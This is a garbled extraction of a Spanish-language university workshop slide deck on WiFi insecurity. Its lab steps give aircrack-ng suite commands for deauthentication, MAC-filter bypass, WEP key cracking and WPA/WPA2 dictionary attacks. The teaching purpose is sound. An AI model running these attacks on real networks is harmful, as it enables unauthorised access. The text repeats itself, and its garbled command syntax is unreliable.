taller-inseguridad wifi.pdf
TRANSCRIPT
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 194
Taller
Conociendo lain
Seguridadde las Redes WiFi (WLAN)
Dr Eduardo Ceh Varelaeduardocehutmetropolitanaedumx
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 294
Objetivo
bull Utilizar herramientas de evaluacioacuten de seguridadpara conocer algunas de las vulnerabilidades de
las redes WiFi (WLAN)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 394
Atencioacuten
bull Las herramientas y teacutecnicas que se presentaraacuten eneste taller serviraacuten para conocer y evaluar lavulnerabilidad de una WLAN y asiacute desarrollar lamejor estrategia para remediar dichasvulnerabilidades
bull Estas herramientas y teacutecnicas no se deben deutilizar para fines ilegales y sin el
consentimiento de la institucioacuten a evaluar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 494
Agenda
bull Conceptos de Seguridadbull Conociendo BackTrack
bull Armando el Laboratorio
bull Seguridad WLAN
bull Saltaacutendose la autenticacioacuten WLAN
bull
Fallas de encripcioacuten WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 594
I- Conceptos de Seguridad
bull Seguridad ldquoGrado de proteccioacuten contra unpeligro dantildeo o peacuterdidardquo (Mike Pastore)
bull Se pretende tener ndash Confidencialidad
ndash Integridad
ndash Disponibilidad
bull Datos en proceso almacenados o en traacutensito
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 694
Riesgo
bull Es cualquier posible evento que pudiera causarun peligro dantildeo o peacuterdida
bull El riesgo no se elimina
ndash
Aceptar el Riesgo ndash Minimizar el Riesgo
ndash Transferir el Riesgo
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 794
Amenaza
bull Causa potencial de un incidente no deseado locual podriacutea resultar en un dantildeo a un sistema u
organizacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 894
Amenazas
Password cracking
Man in the middle
Exploits
Denegacioacuten de servicio
Escalamiento de privilegios
Hacking de Centrales Telefoacutenicas
Keylogging Port scanning
Puertos vulnerables abiertos
Servicios de log inexistentes o que no son revisados
Desactualizacioacuten
Backups inexistentes
Uacuteltimos parches no instalados
Violacioacuten de la privacidad de los empleados
Destruccioacuten de equipamiento
Desastres naturales
Usuarios internos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 994
Maacutes Amenazas
Captura de PC desde el exteriorViolacioacuten de contrasentildeas
Interrupcioacuten de los servicios
VirusMails anoacutenimos con agresiones
Incumplimiento de leyes y regulaciones
Robo o extraviacuteo de notebooks palms
Robo de informacioacuten
Destruccioacuten de soportes documentales
Acceso clandestino a redes
Intercepcioacuten de comunicaciones voz ywireless
Programas ldquobomba troyanosrdquo
Acceso indebido a documentos impresos
Agujeros de seguridad de redes conectadas
Falsificacioacuten de informacioacuten paraterceros
Indisponibilidad de informacioacuten clave
Spamming
Ingenieriacute a social
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1094
Vulnerabilidad
bull Error o mala configuracioacuten de Software oHardware que individuos mal intencionadospueden explotar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1194
Vulnerabilidad
bull httpwwwsecurityfocuscom
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1294
Analogiacutea de Seguridad
Acepto el riesgo
Minimizo el riesgo
Transfiero el riesgo
Amenaza
Vulnerabilidad
Riesgo
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1394
Conexioacuten a Medios Alaacutembricos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1494
Conexioacuten a Redes inalaacutembricas
bull WiFi (80211x)bull 80211abull 80211bbull
80211gbull 80211n
bull Timo Arnall Joslashrn Knutsen and Einar SneveMartinussen
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1594
ClapgnagmlEncripcioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1694
Encripcioacuten
bull Privacidadbull Autenticacioacuten
bull Integridad
bull No repudio
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1794
Encripcioacuten
bull Encripcioacuten Simeacutetrica
bull Encripcioacuten Asimeacutetrica
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994
II- Armando el Laboratorio
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094
Paraacutemetros del laboratorio
bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo
bull Abierto
bull Oculto
bull WEP
bull WPAWPA2
ndash MAC Addressbull 687F7404BE78 (LAN)
bull 687F7404BE7A (WLAN)
ndash Direcciones IPbull WL_AP1 192168165
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294
III- Conociendo BackTrack
bull
Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado
en un equipo de coacutemputo
bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades
ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394
Iniciando con BackTrack
bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD
bull Hacer clic en BackTrack Text ndash Default Boot Text
Mode
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494
Iniciando con BackTrack
bull Teclea el comando startx
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594
Iniciando con BackTrack
bull GUI de BackTrack 5
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694
Configurando la tarjeta
inalaacutembrica
bull Abre una terminal de consolabull Teclea iwconfig
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794
Configurando la tarjeta
inalaacutembrica
bull Teclea ifconfig wlan0 up
bull Teclea ifconfig wlan0
bull Anota la direccioacuten MAC de tu tarjeta
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894
Conectaacutendose al AP
bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994
Conectaacutendose al AP
bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo
bull Teclea iwconfig wlan0
bull Verifica que tengas la MAC del Access Point
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094
Configurando una IP de la red
bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up
bull Verifica tecleando ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194
Probando conectividad
bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC
bull Abre un navegador e intenta navegar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394
IV- Seguridad WLAN
bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing
ndash Packet injection
ndash Sniffing
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494
Capas OSITCP
bull Frames
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594
Frames WLAN (Beacons)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 294
Objetivo
bull Utilizar herramientas de evaluacioacuten de seguridadpara conocer algunas de las vulnerabilidades de
las redes WiFi (WLAN)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 394
Atencioacuten
bull Las herramientas y teacutecnicas que se presentaraacuten eneste taller serviraacuten para conocer y evaluar lavulnerabilidad de una WLAN y asiacute desarrollar lamejor estrategia para remediar dichasvulnerabilidades
bull Estas herramientas y teacutecnicas no se deben deutilizar para fines ilegales y sin el
consentimiento de la institucioacuten a evaluar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 494
Agenda
bull Conceptos de Seguridadbull Conociendo BackTrack
bull Armando el Laboratorio
bull Seguridad WLAN
bull Saltaacutendose la autenticacioacuten WLAN
bull
Fallas de encripcioacuten WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 594
I- Conceptos de Seguridad
bull Seguridad ldquoGrado de proteccioacuten contra unpeligro dantildeo o peacuterdidardquo (Mike Pastore)
bull Se pretende tener ndash Confidencialidad
ndash Integridad
ndash Disponibilidad
bull Datos en proceso almacenados o en traacutensito
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 694
Riesgo
bull Es cualquier posible evento que pudiera causarun peligro dantildeo o peacuterdida
bull El riesgo no se elimina
ndash
Aceptar el Riesgo ndash Minimizar el Riesgo
ndash Transferir el Riesgo
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 794
Amenaza
bull Causa potencial de un incidente no deseado locual podriacutea resultar en un dantildeo a un sistema u
organizacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 894
Amenazas
Password cracking
Man in the middle
Exploits
Denegacioacuten de servicio
Escalamiento de privilegios
Hacking de Centrales Telefoacutenicas
Keylogging Port scanning
Puertos vulnerables abiertos
Servicios de log inexistentes o que no son revisados
Desactualizacioacuten
Backups inexistentes
Uacuteltimos parches no instalados
Violacioacuten de la privacidad de los empleados
Destruccioacuten de equipamiento
Desastres naturales
Usuarios internos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 994
Maacutes Amenazas
Captura de PC desde el exteriorViolacioacuten de contrasentildeas
Interrupcioacuten de los servicios
VirusMails anoacutenimos con agresiones
Incumplimiento de leyes y regulaciones
Robo o extraviacuteo de notebooks palms
Robo de informacioacuten
Destruccioacuten de soportes documentales
Acceso clandestino a redes
Intercepcioacuten de comunicaciones voz ywireless
Programas ldquobomba troyanosrdquo
Acceso indebido a documentos impresos
Agujeros de seguridad de redes conectadas
Falsificacioacuten de informacioacuten paraterceros
Indisponibilidad de informacioacuten clave
Spamming
Ingenieriacute a social
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1094
Vulnerabilidad
bull Error o mala configuracioacuten de Software oHardware que individuos mal intencionadospueden explotar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1194
Vulnerabilidad
bull httpwwwsecurityfocuscom
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1294
Analogiacutea de Seguridad
Acepto el riesgo
Minimizo el riesgo
Transfiero el riesgo
Amenaza
Vulnerabilidad
Riesgo
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1394
Conexioacuten a Medios Alaacutembricos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1494
Conexioacuten a Redes inalaacutembricas
bull WiFi (80211x)bull 80211abull 80211bbull
80211gbull 80211n
bull Timo Arnall Joslashrn Knutsen and Einar SneveMartinussen
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1594
ClapgnagmlEncripcioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1694
Encripcioacuten
bull Privacidadbull Autenticacioacuten
bull Integridad
bull No repudio
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1794
Encripcioacuten
bull Encripcioacuten Simeacutetrica
bull Encripcioacuten Asimeacutetrica
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994
II- Armando el Laboratorio
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094
Paraacutemetros del laboratorio
bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo
bull Abierto
bull Oculto
bull WEP
bull WPAWPA2
ndash MAC Addressbull 687F7404BE78 (LAN)
bull 687F7404BE7A (WLAN)
ndash Direcciones IPbull WL_AP1 192168165
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294
III- Conociendo BackTrack
bull
Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado
en un equipo de coacutemputo
bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades
ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394
Iniciando con BackTrack
bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD
bull Hacer clic en BackTrack Text ndash Default Boot Text
Mode
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494
Iniciando con BackTrack
bull Teclea el comando startx
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594
Iniciando con BackTrack
bull GUI de BackTrack 5
C fi d l j
